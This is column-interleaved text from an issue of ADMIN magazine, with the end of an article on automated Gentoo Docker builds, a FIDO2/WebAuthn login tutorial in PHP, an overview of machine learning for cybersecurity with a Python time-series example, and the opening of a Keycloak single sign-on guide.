‑‑‑> 4e800333acbd Conclusions
Successfully built 4e800333acbd
Successfully tagged dockerrepo.matrix.dev/gentoo‑glibc:latest‑amd64 The approach presented here does
The push refers to repository [dockerrepo.matrix.dev/gentoo‑glibc] involve greater initial effort to keep
22bac475857f: Pushed the containers up to date in a fully
636634f1308a: Layer already exists automated way. In the sense of a
[...] continuous integration/continuous
Step 2/8 : FROM dockerrepo.matrix.dev/gentoo‑glibc:latest‑amd64
deployment pipeline, the applications
[...]
also need to be tested with every new
Step 8/8 : ADD gentoo‑gcc.tar.gz / ‑‑‑> b89e1b4ab2ba
Successfully built b89e1b4ab2ba build to rule out incompatibilities
Successfully tagged dockerrepo.matrix.dev/gentoo‑gcc:latest‑amd64 from changes in the libraries.
The push refers to repository [dockerrepo.matrix.dev/gentoo‑gcc] For Spring Boot applications, the
794c152bde4c: Pushed number of dependencies in the Java
[...] container is manageable. I have also
22bac475857f: Mounted from gentoo‑bind
containerized infrastructure services
636634f1308a: Layer already exists
such as DNS in this way, although
latest‑amd64: digest: sha256:667609580127bd14d287204eaa00f4844d9a5fd2847118a6025e386969fc88d5 size: 1996
cd gentoo‑java; docker build ‑t dockerrepo.matrix.dev/gentoo‑java:latest‑amd64 . && touch buildtime && the number of containers required
docker push dockerrepo.matrix.dev/gentoo‑java:latest‑amd64 && touch pushtime is greater. Nevertheless, automatic
Sending build context to Docker daemon 66.12MB updating of the containers with this
Step 1/6 : FROM dockerrepo.matrix.dev/gentoo‑glibc:latest‑amd64 method has proven very useful in
‑‑‑> 4e800333acbd production operations. n
Step 2/6 : COPY ‑‑from=dockerrepo.matrix.dev/gentoo‑zlib:latest‑amd64 /lib64/* /lib64/
‑‑‑> aaf3f557c027
Step 3/6 : COPY ‑‑from=dockerrepo.matrix.dev/gentoo‑gcc:latest‑amd64 /usr/lib/gcc/
x86_64‑pc‑linux‑gnu/9.3.0/lib* /lib64/ The Author
‑‑‑> 6f7d7264921c Konstantin Agouros works as Head of Open
Step 4/6 : ADD gentoo‑java.tar.gz / Source and AWS Projects at Matrix Technology
‑‑‑> afb2d5612109 AG (Munich, Germany), where he and his team
Step 5/6 : ENV JAVA_HOME /opt/icedtea‑bin‑3.16.0 advise customers on open source, security,
[...]
and cloud issues. His book Software Defined
441dec54d0dd: Pushed
Networking: SDN-Praxis mit Controllern und
22bac475857f: Mounted from gentoo‑glibc
636634f1308a: Layer already exists OpenFlow [Software Defined Networking: Prac-
latest‑amd64: digest: sha256:965aeac1b1cd78cde11aec58d6077f69190954ff59f5064900ae12285e170836 size: 1371 tice with Controllers and OpenFlow] (in German)
is published by de Gruyter.

50 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
S EC U R I T Y Secure Login with FIDO2

Secure authentication with FIDO2

Replacements
The FIDO and FIDO2 standard supports passwordless authentication. We discuss the requirements for the use of
FIDO2 and show a sample implementation for a web service. By Matthias Wübbeling
Moving away from passwords to the release of the FIDO2 standard with device or the trusted platform module
improve account security is a recur- the Web Authentication (WebAuthn) (TPM) chip in your computer.
ring theme for administrators and and the Client to Authenticator Protocol Logging in to a web service (Relying
security researchers. On the Internet, (CTAP) components [3], all the major Party) works like this: The web ap-
the password as a knowledge-based browsers have gradually introduced plication (Relying Party Application)
factor of authentication still domi- support for the Web Authentication is executed in your web browser.
nates the login methods of online JavaScript API and the use of security The server sends a challenge to your
services. Password managers are tokens over CTAP. browser, which the browser signs
increasingly relieving the burden on with your private key and returns to
users as a weak point in password FIDO2 Functionality the web service. The browser func-
selection. However, despite all tech- tions for FIDO authentication are ac-
nical support, many users still use Fortunately, FIDO2 is very straight- cessed from within the application by
passwords that are easy to remember forward and, although it mainly uses the Java Script API.
and therefore easy to crack. Projects cryptographic keys, quite easy to Depending on the device you used to
like Have I Been Pwned [1] or the re- understand. Before you can log in to register key generation, your browser
searchers of the University of Bonn in a web service as a user, you first need accesses your computer’s TPM chip
their EIDI (effective information after to go through a registration process. through the operating system or an
a digital identity theft) project [2] fol- During this process, you generate the external authenticator over the CTAP
low a reactive approach to account cryptographic key material – a public protocol.
Lead Image © lassedesignen, 123RF.com

security; web development needs to and a private key – on a secure de- The authenticator has your private
focus more strongly on alternative au- vice known as the authenticator. The key and needs to generate the signa-
thentication methods. public key is transmitted later to the ture for the challenge. The process
Back in December 2014, the FIDO Al- application server for authentication. often involves entering a PIN or
liance published the FIDO Universal The key is stored there and linked to presenting a biometric feature such
Authentication Framework (FIDO UAF) your user account. The private key as a fingerprint. On local devices,
standard, which was intended to en- remains securely stored on the au- passwordless authentication with
able passwordless authentication. Since thenticator, which can be an external biometrics works without problem.

52 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Secure Login with FIDO2 S EC U R I T Y

The authenticator returns the signed this article, I use a YubiKey NFC clear the browser cache to avoid be-
challenge to the browser, which (near-field communication) stick, ing redirected.
passes it on to the application version 5, and a fairly new Android You can now access the test applica-
server. The server in turn verifies smartphone. The YubiKey is directly tion website with the URL mentioned
the signature with the stored public detected on Linux as Yubico YubiKey above. When you get there, you can
key. If it is valid, the login is com- OTP+FIDO+CCID, which you can access your browser’s WebAuthn API
pleted successfully. reveal with the command by pressing New Registration and pro-
The crucial difference with this ap- ceed to register the existing security
proach is that you do not need a sudo dmesg ‑w token. If you want to test the applica-
certificate authority (CA) to verify the tion from your smartphone, you need
user’s identity and then issue a cer- by watching the kernel output when to install a valid SSL certificate. On
tificate. The identity of the user is not plugging in the key. You can then go Android, you could otherwise receive
the main focus of FIDO, which is also to the WebAuthn demo page [4] for a message that the browser is not
true of password-based authentica- initial testing. If the authenticator compatible.
tion. Instead, the aim is to recognize works with your browser, the next
a user reliably, which means you can step is to try FIDO2 on your own Passwordless
also use FIDO for secure authentica- web page.
tion of what are basically anony-
Authentication with PHP
mous user accounts. Also, the use of Creating the Server To help you upgrade your own web
several, and even different, keys is application with FIDO2, I will refer to
supported. FIDO2 even lets you as a
Application the sample application as a guide and
provider prescribe and verify the type To test the following examples, I will look for the important components in
of devices used as authenticators. In use the PHP WebAuthn library by the examples for an abstract service
the course of certification, a model Lukas Buchs [5]. If you already use a of your own.
key pair is generated that can also be PHP-enabled server, you can provide
integrated into the signature process. the sample application directly in the Listing 1: docker‑compose.yaml
In this way, you as a provider can WebAuthn _test folder and deliver web:
ensure that your customers use cer- the page. Without an appropriate en- image: nginx:latest
tain device classes, such as devices vironment, Docker Compose lets you ports:
that can only be unlocked with a PIN set up NGINX with PHP quickly and ‑ "8080:80"
or fingerprint. The model key pair is easily (Listing 1). volumes:
then installed on all devices of a cer- The NGINX configuration requires the ‑ ./WebAuthn:/usr/share/nginx/html/WebAuthn
tain model (i.e., it is model-specific, default.conf file (Listing 2), which ‑ ./default.conf:/etc/nginx/conf.d/ default.conf
but not unique to a device). configures forwarding to the PHP- left:
‑ php
FPM server for all files ending in .php.
php:
Trusted Authenticator Because the client.html file, which is
image: php:fpm
delivered as a static page, is located in
volumes:
To sign the challenge from the ap- the same folder as the server.php file, ‑ ./WebAuthn:/var/www/html/WebAuthn
plication server, you need another the same folder is included in both
device, known as the authenticator, containers in docker‑compose.yaml.
which can be an internal device, the You can now start the two Docker Listing 2: default.conf
TPM in your computer, or an exter- containers: server {
nal device, such as a USB security index index.php index.html;
token like a YubiKey. Android has docker‑compose up server_name php‑docker.local;
had FIDO2 certification since Febru- error_log /var/log/nginx/error.log;
access_log /var/log/nginx/access.log;
ary 2019. Therefore, on devices with If you then call http://local-
root /code;
suitable hardware and Android 7 or host:8080/WebAuthn/_test/client.
location ~ \.php$ {
higher, you always have an internal html in your browser, you will be
try_files $uri =404;
authenticator in your pocket. You redirected to a secure HTTPS page, fastcgi_split_path_info ^(.+\.php)(/.+)$;
can unlock it with your fingerprint or although this connection will fail. fastcgi_pass php:9000;
the screen lock PIN. For communica- The redirection is defined in the fastcgi_index index.php;
tion with the security token, FIDO WebAuthn client.html file. For this include fastcgi_params;
defines the CTAP1 and CTAP2 Client test, it is not necessary, however. fastcgi_param SCRIPT_FILENAME
to Authenticator protocols; version Just remove the JavaScript state- $document_root$fastcgi_script_name;
1 is also known as Universal-2nd- ment that starts with window.onload fastcgi_param PATH_INFO $fastcgi_path_info;
Factor (U2F) and version 2 as FIDO2 in client.html (lines 246-253). Af- }
}
or WebAuthn. For test purposes in terward, you will probably have to

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 53
S EC U R I T Y Secure Login with FIDO2

As a concrete use case, I will be look- public key to the correct account and application and the domain name
ing into passwordless authentication log in. You can integrate the user- as the ID of the relying party. This
with PHP based on the Lukas Buchs name into the path. For example, the name is displayed to the user for ver-
WebAuthn library mentioned above. path /fido/create/user/Hans would be ification during creation and input.
This exercise assumes that your PHP- used to create and upload the public
based web service is located on a key for user Hans. The next command Creating a Key Pair
publicly accessible server and that lets you read the username dynami-
you have already installed a valid cer- cally from a corresponding input field The endpoint created in /fido/create
tificate for the server (e.g., from Let’s of your login form and add the values lets you create a new key pair. In the
Encrypt). As the database, you can to the previously defined paths: process, you will differentiate between
use a database management system the GET and POST methods. First, the
of your choice; you can also store user_url = 'user/' + (U JavaScript client uses the GET method.
multiple public keys for each of your document.getElementById('user').value) U The server uses the following com-
users in the database. + '/'; mands to send the required informa-
As the JavaScript for your web ap- tion to the client:
plication, use the client.html file in Depending on whether you have
the _test directory of the WebAuthn already authenticated the user at $WebAuthn = new \WebAuthn\WebAuthn(U
library and save the functions in a the time of reregistration of a public 'IT‑Administrator', U
separate file (e.g., fido.js), which key and recognize them from a valid 'it‑administrator.de', U
you then include on the login page of session, you will only need to spec- array('fido‑u2f', 'packed', U

your web service. You can dispense ify the user in the URL for the login 'android‑key', U

with the clearregistration() function (i.e., the functions in checkregistra‑ 'android‑safetynet', 'none'));
if you are planning another approach tion()). Once the paths have been $createArgs = $WebAuthn‑>U
to managing the stored public keys. adapted and assuming the username getCreateArgs($user_id, $nick, U

If you already have a working ap- is reliably passed in, the client side $display name);
plication with login capabilities, you is now set up.
need to adjust the paths in the four Before making the adjustments on the The values of the three arguments for
remaining calls to the window.fetch server side, take a look in the _test getCreateArgs() can also be identi-
function. You don’t really need the folder from the sample WebAuthn ap- cal. They only need to be unique for
parameters for the HTTP requests plication at the server.php file, which each user because they are used to
coming from the getGetParams() has four function areas that you can
method. The CA certificates are op- use for each of the paths mentioned
tional, and I do not plan to restrict above. The ASCII art rendering of the
the choice of security token vendor process in the header of the file again
for the time being. illustrates the process of registration
and testing. I will be adopting the
Queries with GET and POST four relevant areas for the various
endpoints of this example project.
With PHP you can easily distinguish In the upper part of the file, the sup-
between the GET and POST methods. ported formats are selected on the ba-
You only need two paths, which you sis of the HTTP arguments passed in.
can route to two functions in your Because you don’t want to limit your-
web application according to the self in terms of the choice of security
request method. For example, if the token at first, you have to pass in all
two paths are /fido/create and /fido/ supported devices as an array:
login, in /fido/create you use GET
to request the parameters to create a $WebAuthn = new \WebAuthn\WebAuthn(U
new key pair, and you use POST to 'IT‑Administrator', U

upload the signature and store the 'it‑administrator.de', U

public key on the server. In /fido/ array('fido‑u2f', 'packed', U

login you use the GET method again 'android‑key', U

to request the parameters for the sig- 'android‑safetynet', 'none'));


nature and POST to send this signa-
ture to the server for authentication. To take most of the work off your
It is important that you always in- hands, always create a WebAuthn
clude the username, which needs to object first. As a reference, you can Figure 1: Selecting an authenticator on the
be known to assign the deposited pass in an arbitrary name for your smartphone.

54 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Secure Login with FIDO2 S EC U R I T Y

distinguish different keys on the secu- You might see an error before reading are winning. The JavaScript client ac-
rity token, if supported by the token the challenge from the session vari- cepts an object in JSON and evaluates
supports. To accept the new key, a able. In fact, this error occurs at session the success and msg fields:
challenge is sent along, signed on the startup when PHP tries to create an ob-
token, and uploaded with the public ject of the \WebAuthn\Binary\ByteBuffer $return = new stdClass();
key in the second step. The best idea type before the class is known to the $return‑>success = true;
would be to save this challenge in the script. This error can be remedied by $return‑>msg = 'Registration Success;
current user session and then return simply including the WebAuthn library print(json_encode($return));
the parameters created here in JSON before session_start() and preloading return;
format to the JavaScript client to com- the class with use:
plete the first step: This successfully completes the pro-
require_once 'WebAuthn/WebAuthn.php'; cess of generating the key, and you
$_SESSION['fido_challenge'] = U use WebAuthn\Binary\ByteBuffer; can verify that the two values are
$WebAuthn‑>getChallenge(); stored in the database.
print(json_encode($createArgs)); Next, the user information available
return; in Base64 format and the information First Login
about the Authenticator need to be
Now the server is waiting for the pub- decoded, starting a generation pro- Now that the public key and the cre-
lic key and the first signature to be cess that, if successful, returns a cor- dential ID assigned by the security
sent, which can then be verified with responding object if the challenge has token are stored in the database,
the public key. On an Android smart- a valid signature: the user can log on to your system.
phone, you can now select which au- Again, the user first uses GET to
thentication method you want to use $clientDataJSON = U request the challenge and other pa-
to unlock the private key locally on base64_decode($post‑>clientDataJSON); rameters from the application server.
the smartphone (Figure 1). $attestationObject = U Because you do not have a valid ses-
Even if not provided for in the sample base64_decode($post‑>attestation‑Object); sion at this time, the JavaScript client
application, I recommend that the $data = $WebAuthn‑>U in your application needs to query
user additionally specify a name for processCreate($clientDataJSON, U the username or, as described, read
the token or device in your applica- $attestationObject, U it from a login form. Along with the
tion so that simple mapping is pos- $challenge); username, which you pass in with
sible later on. This name is now also the URL for simplicity’s sake, all
transferred to /fido/create in the The required credential ID and the the stored credential IDs of the user
POST request. In the called method, user’s public key can now be read can now be read from the database.
the generated signature must now be from the object in the $data variable. Remember that these are stored in
verified with the public key that was How you store these values in your Base64 encoding; therefore you trans-
also uploaded. To do this, read it from database depends on your current mit all stored IDs to the client so it
the body of the request as follows and configuration. However, you will can select a suitable one. You do not
evaluate the JSON it contains accord- want to change the credential ID’s need the public key in this call yet.
ingly: encoding back to Base64 before sav- You can now create the challenge
ing, because many databases do not with the commands:
$post = trim(file_get_contents(U accept binary data. The public key is
'php://input')); in privacy-enhanced mail (PEM) for- $ids = array();
if ($post) { mat and is therefore already Base64 foreach($dbdata AS $credentials){U
$post = json_decode($post); encoded: $ids[] = base64_decode(U
} $credentials['credentialId']);
$credentialId = U }
The token also sends a unique cre- base64_encode($data‑>credentialId); $getArgs = $WebAuthn>getGetArgs($ids);
dential ID that is used to identify $credentialPublicKey = U $_SESSION['challenge'] = U

the key pair. This credential ID and $data‑>credentialPublicKey; $WebAuthn‑> getChallenge();


the public key are stored in the print(json_encode($getArgs));
database for the logged on user. Keep in mind that it has to be pos- return;
The other values do not need to be sible for each user to store multiple
stored permanently. To create the public keys. In this way, the user You will have to adapt the variables
object, the challenge is first read keeps access to their account even if and indexes in the foreach construct
from the session: they can no longer use one of the to- to match your database structure.
kens. If you have stored these values Now the client can sign the chal-
$challenge = $_SESSION['fido_challenge']; appropriately for your database, you lenge with a security token to match

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 55
S EC U R I T Y Secure Login with FIDO2

the IDs and POST the signature back success and msg attributes as shown adjustments to the process. For ex-
to the web application in the body earlier. If the public key is found, you ample, given the appropriate infor-
of the challenge. The challenge for still need the challenge from the ses- mation, authentication can be imple-
selecting a security token in Firefox sion, which you can then use to per- mented without the need to enter
is shown in Figure 2. form the check: usernames. Or you can use FIDO2
Now read the HTTP body of the as a second factor, just as some on-
request again and decode the JSON $challenge = $_SESSION['challenge']; line services already make use of its
it contains as shown above. The fol- functionality. With Windows 10 and
lowing commands take the data apart $WebAuthn‑>U Microsoft Hello as the authenticator,
and decode the Base64 data it con- processGet($clientDataJSON, U you can also use FIDO2 on the de-
tains once again: $authenticatorData, U vices in your Windows domain.
$signature, U

$clientDataJSON = U $credentialPublicKey, U
Conclusions
base64_decode($post‑>clientDataJSON); $challenge);
$authenticatorData = U In this article, I showed you how
base64_decode($post‑>authenticatorData); This command throws a WebAuth‑ to enable FIDO2-based login for a
$signature = U nException if an error occurs during web service. If you prefer to use lan-
base64_decode($post‑>signature); the check; you need to handle this guages other than PHP for your web
$credentialId = base64_decode($post‑>id); accordingly. Without an error, the development, you will find similar
user is considered to be logged in. libraries for them. The principle re-
Now find the public key to match the Now you can create all session data, mains the same, and you do not nec-
credential ID in your database and just as after a normal login, and essarily have to adapt the JavaScript
store it in the $credentialPublicKey then report success back to the cli- page of the client. Just try out the
variable. Again, remember that the ent. You can reload the page with different FIDO2 configuration and
data in the database is Base64 en- JavaScript or configure a redirection usage possibilities. n
coded. If there is no matching key, to a subpage.
you need to return a corresponding
error. To do so, use an object and the Other Possible Uses Info
[1] Have I Been Pwned:
Once you have [https://haveibeenpwned.com]
completed the [2] EIDI project: [https://itsec.cs.uni-bonn.de/
development of eidi/] (in German)
a FIDO2 login as [3] FIDO: [https://fidoalliance.org/fido2/]
shown, you will [4] WebAuthn demo page:
certainly start [https://webauthn.io]
thinking about [5] WebAuthn library by Lukas Buchs:
Figure 2: A Firefox request to use a security token. many potential [https://github.com/lbuchs/WebAuthn]

56 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
S EC U R I T Y Cybersecurity and ML

Machine learning and security

Computer Cop
Machine learning can address risks and help defend the IT infrastructure by strengthening and simplifying
cybersecurity. By Andreas Bühlmeier

Although machine learning (ML) In this article, I try to answer these exist in unsupervised learning, for
applications always put a great deal questions, without claiming to be ex- which the method uses the statistical
of effort into preprocessing data, the haustive. properties of the input signals, such
algorithms can also automatically as the accumulation of similar input
detect structures. Deep learning in ML at a Glance patterns. In machine learning, a basic
particular has led to further progress distinction is made between unsuper-
in the field of feature extraction, Every ML system (Figure 1) has vised learning, supervised learning,
which makes ML algorithms even an input (x) through which it (one and reinforcement learning.
more interesting, especially for cy- hopes) receives relevant information In unsupervised learning, the system
bersecurity tasks. and from which it typically makes a independently identifies patterns in
In IT security, data volumes are often classification (y). In the field of cy- the input data, which allows it to
huge, and interpreting them involves bersecurity, for example, this would detect unusual events, such as a user
massive effort, either because of the be triggering an alarm or determining suddenly emailing a large volume of
sheer bulk or the complexity. Not sur- that everything is okay. data to an address outside the organi-
prisingly, then, cybersecurity product A target vector (t) or a reward signal zation. Server logs or a direct stream
vendors often offer special ML tool- (r) is used for adaptation (learning) of network data, for example, serve as
kits such as Splunk [1] or Darktrace of system M. This feedback does not output data. In the case of anomalies,
[2], which apparently relies almost
entirely on machine learning.
Although machine learning has not
suddenly turned the cybersecurity
world completely on its head (even if
some product vendors believe it has),
you need to answer the following
questions – if only to stay on top of
Lead Image © Vlad Kochelaevskiy, 123RF.com

the latest developments:


n Which machine learning principles
apply to cybersecurity?
n What do typical scenarios for de-
fense and attack look like?
n What trends can be expected in
the area of combining machine
learning and cybersecurity? Figure 1: The basic structure of a machine learning system.

58 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Cybersecurity and ML S EC U R I T Y

the system executes actions accord- programs. In this way, you can teach detection) into a text recognition
ing to the specifications defined in the system to distinguish “good” from problem. In the case of logfile clas-
playbooks (e.g., informing a cyberse- “bad” log data through supervised sification, you can then turn to proven
curity team, which then checks to see learning. algorithms as provided by tried and
whether a problem exists or whether The principle of logfile classification trusted libraries. For example, the
an employee has had to perform un- sounds simple, but it requires inten- Python sklearn library can be used to
usual actions for legitimate tasks). sive preprocessing. For classifiers transform a problem from textual to
Supervised learning (Figure 2) re- like neural networks, only numerical numerical. However, logfile classifica-
quires an assignment of the input values are suitable as input vari- tion is only one of many examples.
and output, wherein the system is ables – and preferably values between Figure 4 roughly visualizes the ap-
presented with examples of log data 0 and 1. Therefore, the text informa- proach of the machine learning part
that should not trigger an alarm and tion from the log first needs to be in cybersecurity. The breakdown is
other data that should. For example, coded numerically. intended to help provide an over-
you can run some malware in a sand- In principle, this just means transform- view, but it does not claim to be uni-
box and track its actions (e.g., which ing the security problem (malware versally valid.
registry entries it makes). The cor-
responding log data then provides an
example for the Malware_Alert class,
and other normal log entries are as-
signed to the No_Alert class. Typi-
cally, however, the logs are not typed
in directly as input; instead, the data
is first cleaned up and features are Figure 2: Processing steps in supervised learning.
extracted – the only way to achieve
efficient classification – such as the
frequency of certain words.
The special feature of reinforcement
learning is the feedback received by
the system. In this context, experts
refer to the reward, which is only
given after a number of actions. This
technique is also known as delayed
reinforcement. The idea behind rein-
forcement learning is that the system
interacts with the environment as
an agent, much like a sentient being
(Figure 3). The agent has to explore Figure 3: The reinforcement learning approach: An agent (A) interacts with the
the environment and typically only environment (U), performing actions on the basis of states and on what has already been
learns after a certain number of ac- learned (Q table). Through a combination of trial and error and the use of experience, the Q
tions whether it was successful and table is constantly optimized.
will receive a reward.

Cybersecurity and ML
The use of machine learning in cyber-
security is based on transforming the
security problem into an ML problem
or, more generally, into a data science
problem. For example, one approach
could be to use data generated by
malware and by a harmless program
to distinguish between the two cases.
To do this, you set up an identified
malware program on a separate vir-
tual machine and track which logfiles
it generates. Similarly, you would
collect the logfiles from harmless Figure 4: The machine learning part of cybersecurity.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 59
S EC U R I T Y Cybersecurity and ML

The starting point (1) is typically Text analysis (4a) helps by combining train and interpret. The hidden layers
a manually identified threat, such logfile entries and creating clusters. are neurons (shown as circles) that are
as malware or phishing attacks. To This technique is used to tag the data not directly connected to the output
identify the threat, you must acquire as belonging to a pattern class. Fea- (alert/no alert) or the input data. A
relevant data (2) (e.g., from operating ture analysis (4b) is able to detect fur- deep neural network has more than
system or application logfiles). The ther patterns in the input data, such one such level.
acquired data is then prepared (3) as time dependencies. Additionally, numerous other proce-
(e.g., by data science algorithms) for Deep learning (4c) is another use- dures can be used (4d in Figure 4),
the respective threat scenarios. ful variant. Neural networks with an such as decision trees. The end of the
In the next step, the data is then fur- inner structure that contains more process results in a classification (5):
ther processed by ML algorithms. For than one hidden layer (Figure 5) are Should an alert be triggered?
selected threat scenarios, one or more referred to as “deep.” These networks
algorithms is chosen to prepare for are particularly well suited for feature Experiments
a subsequent alert/no alert decision. extraction, but are more complex to
As an alternative to programming your
own neural network, you can install
trial versions of well-known tools and
explore the possibilities of machine
learning with the help of their toolkits.
For example, you can install and use
Splunk Enterprise and its Machine
Learning Toolkit (Figure 6) with a
trial license for up to 60 days and
index up to 500MB of data per day.
The software provides a number of
examples for different deployment
scenarios, including IT security. The
installation includes sample data for
Figure 5: A deep neural network. testing various scenarios.

Figure 6: The Splunk Machine Learning Toolkit offers several showcases for experimentation.

60 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Cybersecurity and ML S EC U R I T Y

Appropriate data is not always at Typically you will see far more logins data is that you can influence individ-
hand for testing algorithms. Creating on workdays and significantly fewer ual parameters in a targeted manner,
the data yourself gives you more con- on weekends, showing more or less as shown here with the random_gain
trol over the order of randomness you pronounced fluctuations. Listing 1 parameter (lines 25 and 28) in the
desire. For example, the time series in shows how such a time series can be noise section.
Figure 7 represents logins. generated. The advantage of simulated For practical use, you still have to
perform tests with real data and
handle special cases such as holidays
separately. If you want to get more
involved in time series prediction, a
paper from TensorFlow [3] is recom-
mended reading. The idea here is that
if you encounter data that the system
is unable to predict, you should sus-
pect that a security problem exists.

How Attackers Use ML


Machine Learning can be used not
only to defend against attackers,
hackers are also aware of the poten-
tial of the technology. The danger
of phishing attacks, for example,
has increased because fake email is
Figure 7: A simulated normalized time series representing the number of logins. becoming increasingly difficult to
S EC U R I T Y Cybersecurity and ML

distinguish from authentic messages. and not try to train their agent on the and what is not. Ultimately, the learn-
Machine learning can further increase potential victim; this would be far too ing system can derive what needs to
the attack quality (e.g., by automati- easy to detect. Instead, they could set be done from the actions of a security
cally revealing the similarities in un- up special training environments with employee and thus help reduce the
supervised learning). In combination standard installations that could then workload.
with Natural Language Processing be used to optimize agents. They can Only the tip of the iceberg is likely
(NLP) algorithms, random variations also develop attack strategies that a visible for the combination of ma-
can be built into email so that the in- person would not have thought of in chine learning and cybersecurity. At-
dividual copies are merely similar but this way. tackers and defenders will continue
not identical, which makes phishing to push each other’s limits, with solu-
attacks less easy to detect. Conclusions tions maturing in the process – which
The challenge of reinforcement learn- means it is all the more important to
ing is that the system needs quite Both machine learning and cyberse- keep up to date. n
a large number of tests to learn the curity are already massively impor-
correct behavior. Therefore, the de- tant for IT systems and will probably
velopment of such algorithms relies become even more so in the future. Info
on simulated environments – such Machine learning has the potential to [1] Splunk: [https://www.splunk.com]
as video games – to create the world simplify cybersecurity by enabling de- [2] Darktrace: [https://www.darktrace.com]
in which the agent interacts. Hack- fense systems to adapt. To do this, the [3] Time series: [https://www.tensorflow.org/
ers would proceed in a similar way system needs to know what is normal tutorials/structured_data/time_series]

Listing 1: Creating a Time Series


01 import numpy as np 28 my_data[i] += np.random.rand() * random_gain
02 import plotly.graph_objects as go 29 i += 1
03 30
04 step = 1 / 1000 t = np.arange(0, 1, step) # time vector
31 my_data_max = np.amax(my_data)
05 periods = 30 # number of 'days'
32 print('max value is: ' + str(my_data_max))
06
07 # function to produce base sine data 33 # normalize the data to a range up to 1.0
08 # with a 7th of the base frequency overlap 34 my_norm_data = []
09 def data_w_weekend(t): 35 i = 0
10 if np.sin(periods / 7 * 2 * np.pi * t) > 0.5: 36 while i < 1000:
11 value = 0.001 * np.sin(periods * 2 * np.pi * t) 37 my_norm_data.append(my_data[i]/my_data_max)
12 return max(value, 0.0)
38 i += 1
13 else:
39
14 value = np.sin(periods * 2 * np.pi * t)
15 return max(value, 0.0) 40 # plot the data
16 41 trace0 = go.Scatter(
17 # building the data vector 42 x = t,
18 my_data = [] 43 y = my_norm_data,
19 i = 0 44 name='Logons'
20 while i < 1000: 45 )
21 my_data.append(data_w_weekend(i / 1000))
46 fig = go.Figure()
22 i += 1
23 47
24 # add some noise 48 layout = go.Layout(title="Logins over time", xaxis={'title':'time'},
25 random_gain = 0.1 # factor for the noise yaxis={'title':'occurences'})
26 i = 0 49 fig = go.Figure(data=trace0, layout=layout)
27 while i < 1000: 50 fig.show()

62 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
S EC U R I T Y Keycloak

Single sign-on with Keycloak

Master of
the Keys
Google and Facebook are two of the biggest providers for single sign-on on the web, with OAuth2 and OpenID,
but if you don’t want to put your customers’ or employees’ data in their hands, Red Hat’s Keycloak software lets
you run your own operations with the option of integrating existing Kerberos or LDAP accounts. By Matthias Wübbeling

Single sign-on (SSO) offers many own services (e.g., Jira, Confluence, 12 was current. To launch the con-
advantages, and SSO providers can Bitbucket). If you want to set up your tainer, use the command:
provide valuable services in terms of own server, you can also start with the
user account security. Although each open source alternative Keycloak [1]. docker run ‑p 8080:8080 U

user only needs to remember one The software, developed by Red Hat, ‑e KEYCLOAK_USER=admin U

password to access different services has been around since 2014 and is cur- ‑e KEYCLOAK_PASSWORD=it‑administrator U

(which is not to be confused with a rently being developed under the um- quay.io/keycloak/keycloak:11.0.0
user simply using the same password brella of the JBoss application server.
for different services), the providers Change the username and password to
themselves do not have any knowl- DIY SSO suit your needs. In addition to the two
edge of the password used. If a data environment variables specified, the
leak occurs in one of the services, The advantage of operating an SSO container offers a variety of other con-
passwords will not fall easily into server like Keycloak yourself is that figuration options [3], starting with
the hands of criminals. The service you can include virtually any exist- the selection of the database backend
exclusively relies on the SSO provider ing directory service. Your users can and the integration of TLS certificates,
to verify the user’s identity securely. then use the same credentials as on as well as clustering options for high
For some providers, the identity itself their domain machines or for ac- availability. As soon as the container
is not important, the only important cessing email. As the client protocol, has started up, you can use your
thing is to identify the same person Keycloak supports OpenID Connect or browser to access the welcome page at
beyond any doubt. the somewhat older SAML (security http://localhost:8080/. Now select Ad-
To use SSO, you are not dependent on assertion markup language). If you ministration Console and log in with
Lead Image © Kirsty Pargeter, 123RF.com

the three major players, Google, Face- have the choice, the Keycloak devel- the selected user ID.
book, or OpenID. Although you have a opers recommend OpenID Connect,
number of smaller and specialized pro- which is an extension of OAuth 2.0 Configuration
viders from which to choose, you can and offers JSON web tokens, among
also set up an SSO service yourself. Of- other things. First, familiarize yourself with the
ten the commercial “Atlassion Crowd” To test Keycloak, you can use Docker interface and adjust the basic con-
SSO server is used, which acts as the container version 11 [2], as used for figuration in Realm Settings. For ex-
authentication center for Atlassian’s this article, although at print, version ample, if you have enabled TLS and

64 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Keycloak S EC U R I T Y

want to make it mandatory for logins, (e.g., Active Directory); some default Test Login
check the box in Login | Require settings will be entered for you.
SSL. To configure an email account Next, complete the settings marked If you have a user account in LDAP,
for Keycloak communications, go to with a red asterisk. You can accept test logging in by trying to log in to the
Email. Again, you will want to use the suggestions for the attributes first, Administration Console. If the login
TLS or StartTLS. To protect Keycloak unless you have defined non-default works, you will see a message stating
against attacks, you can also enable attributes in your LDAP. You can en- that the access is Forbidden for this
brute force detection under Security ter the Connection URL and schema user. This information is all you need
Defenses. As with Fail2Ban, you can (e.g., ldaps://ldap.example.org:636/ to test the basic functionality. Now
configure different parameters after for a TLS-secured connection); then, click on your username in the upper
enabling. click Test Connection to check the right corner to enter the user menu,
In the Clients section, configure the connection to the LDAP server. Now which takes you to an overview of the
applications that Keycloak can use for define the location of the users in applications and active sessions in use.
authentication by assigning a unique the LDAP tree, configure a user with If you want to use a second factor for
